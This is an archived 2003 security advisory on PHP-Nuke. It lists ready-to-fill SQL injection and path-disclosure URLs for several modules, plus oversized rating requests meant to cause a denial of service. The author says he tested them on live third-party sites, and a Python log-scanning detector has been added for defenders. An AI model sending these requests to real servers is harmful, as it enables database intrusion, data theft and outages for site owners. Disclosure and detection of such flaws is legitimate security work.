Message-ID: <008201c32eba$c2d50140$050010ac@rootserver>
From: novappc at novappc.com (Lorenzo Hernandez Garcia-Hierro)
Subject: PHP-Nuke Main Modules SQL Injections , Path Disclosures and Denial of Service Attack in Rating Systems
-------
Product: PHP-Nuke
Vendor: Francisco Burzi
Versions Vulnerable:
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 RC3
Francisco Burzi PHP-Nuke 6.5 RC2
Francisco Burzi PHP-Nuke 6.5 RC1
Francisco Burzi PHP-Nuke 6.5 FINAL
Francisco Burzi PHP-Nuke 6.5 BETA 1
Francisco Burzi PHP-Nuke 6.5
6.5 with all patches,
6.0 with all patches,
5.5 with all patches.
Not vulnerable:
?
------
DESCRIPTION:
------
New SQL Injections and Path Disclosures related to the main modules.
Please look at the final ` (backtick): other SQL injections don't use it, but
here it is essential for making a successful query.
--------
FOUND VULNERABLE MODULES:
--------
--------
- SECTIONS (NEW)
--------
Type: SQL Injection and Path Disclosure
*********
Exploit:
http://[target]/modules.php?name=Sections&op=listarticles&secid=`[YOUR QUERY] (NEW)
-
http://[target]/modules.php?name=Sections&op=viewarticle&artid=`[YOUR QUERY] (NEW)
-
http://[target]/modules.php?name=Sections&op=printpage&artid=`[YOUR QUERY] (NEW)
--------
- AVANTGO
--------
Type: SQL Injection and Path disclosure. (NEW)
*********
Exploit:
http://[target]/modules.php?name=AvantGo&file=print&sid=`[YOUR QUERY]
--------
- SURVEYS (NEW)
--------
Type: SQL Injection and Path disclosure.
********
Exploit:
http://[target]/modules.php?name=Surveys&pollID=`[YOUR QUERY]
-
http://[target]/modules.php?name=Surveys&op=results&pollID=`[YOUR QUERY]&mode=&order=0&thold=0
--------
- DOWNLOADS
--------
Type: SQL Injection and Path disclosure. (NEW)
********
Exploit:
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR QUERY]
-
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR QUERY]&orderby=titleD
-------------
NEW TYPE OF PHPNUKE ATTACK IN DOWNLOADS MODULE (NEW)
-------------
I found a possible denial of service attack in the Downloads module through
the rating system.
Exploit:
http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=?&ratinghost_name=?&rating=99999999999999999999999999999999999999999999999999999999999999999999999
When the file is rated, the file gets a 238,609,298.89 rating. This can be
used to make a denial of service attack against the MySQL server or to send a
very long buffer (buffer overflow, stack crashes). The MySQL server stores
this value because there is an error with the query (more characters in the
field than the allowed number of characters); if you send a buffer longer
than the allowed/accepted size, the server becomes unstable and the system
hangs.
Exploit to SQL Injection and Denial of Service Attack:
http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=?&ratinghost_name=?&rating=`[HERE GOES SQL QUERY]
--------
- REVIEWS (NEW)
--------
Type: SQL Injection and Path disclosure.
********
Exploit:
http://[target]/modules.php?name=Reviews&rop=showcontent&id=`[YOUR QUERY]
--------
- WEB_LINKS
--------
Type: SQL Injection (NEW) and Path disclosure. (NEW)
********
Exploit:
http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=`[YOUR QUERY]
-
http://[target]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=`[YOUR QUERY]&ratetype=num
- The Web_Links module is affected by the possible DoS attack that I discovered
and by the SQL Injections and buffer overflows:
Exploit:
http://[target]/modules.php?name=Web_Links&ratinglid=96&ratinguser=?&ratinghost_name=?&rating=[DATA]
[DATA] = your random data to send (rating points and the field buffer, of
course).
--------
SOLUTION:
--------
- Deactivate the affected modules entirely.
- A temporary workaround for the Path Disclosure is to configure the error
reporting flags in php.ini (no reporting), but this is not a very good
solution (WORKAROUND only).
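Added here as a defender's example, not part of the original advisory: a small Python check that scans constructed Apache-style access log lines for the two request shapes described above, a non-numeric value (such as the backtick) in a parameter the listed modules use as an integer id, and a rating value far outside what the rating form would submit. The parameter names are taken from the URLs in this advisory; the 1..10 rating limit, the log format and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the advisory's URLs feed to the modules as integer ids.
NUMERIC_PARAMS = {"secid", "artid", "sid", "pollID", "cid", "id", "ratenum", "ratinglid"}
RATING_MAX = 10  # assumption: the rating form only submits 1..10

# Apache common log format: client ip ... "METHOD URI PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+) [^"]*"')

def inspect_request(uri):
    """Return (parameter, reason) findings for one modules.php request URI."""
    parts = urlsplit(uri)
    if not parts.path.endswith("modules.php"):
        return []
    findings = []
    # parse_qs percent-decodes, so an encoded %60 arrives as a literal backtick
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            is_int = re.fullmatch(r"[0-9]+", value) is not None
            if name in NUMERIC_PARAMS and value and not is_int:
                findings.append((name, "non-numeric value in integer parameter"))
            elif name == "rating" and not is_int:
                findings.append((name, "non-numeric rating"))
            elif name == "rating" and (len(value) > 2 or int(value) > RATING_MAX):
                findings.append((name, "rating out of range"))
    return findings

def scan_log(lines):
    """Return (ip, uri, findings) for each log line carrying a suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (findings := inspect_request(m.group("uri"))):
            hits.append((m.group("ip"), m.group("uri"), findings))
    return hits

# Constructed sample log lines, not real traffic: a normal article view, a backtick
# probe against artid, an oversized rating, and a request outside modules.php.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jun/2003:12:00:01 +0200] "GET /modules.php?name=Sections&op=viewarticle&artid=12 HTTP/1.0" 200 5120',
    '10.0.0.9 - - [10/Jun/2003:12:00:07 +0200] "GET /modules.php?name=Sections&op=viewarticle&artid=%60 HTTP/1.0" 200 1024',
    '10.0.0.9 - - [10/Jun/2003:12:00:09 +0200] "GET /modules.php?name=Downloads&ratinglid=7&ratinguser=&ratinghost_name=&rating=99999999999999999999 HTTP/1.0" 200 880',
    '10.0.0.3 - - [10/Jun/2003:12:00:12 +0200] "GET /index.php HTTP/1.0" 200 3000',
]

if __name__ == "__main__":
    for ip, uri, findings in scan_log(SAMPLE_LOG):
        print(ip, uri, findings)
```

Only the second and third sample lines are reported; a blank id (e.g. an empty secid) is left alone because PHP-Nuke treats it as 0.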
-----
WHAT CAN HAPPEN? AND NOTES
-----
Gain access to the PHP-Nuke database, content changing, gain access to
private info, server paths revealed. MySQL server buffer overflow, MySQL
server hang, server hang.
-NOTES-
I tested it on phpnuke-espanol.org and it is vulnerable to all of them.
I tested it on phpnuke.org and it is vulnerable in the active modules affected
by this (Downloads, Surveys) (some errors aren't reported because php.ini
is configured for this, but the vulnerabilities are present).
-----
CONTACT INFO:
---------------------------------------
Lorenzo Manuel Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--www.novappc.com --
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************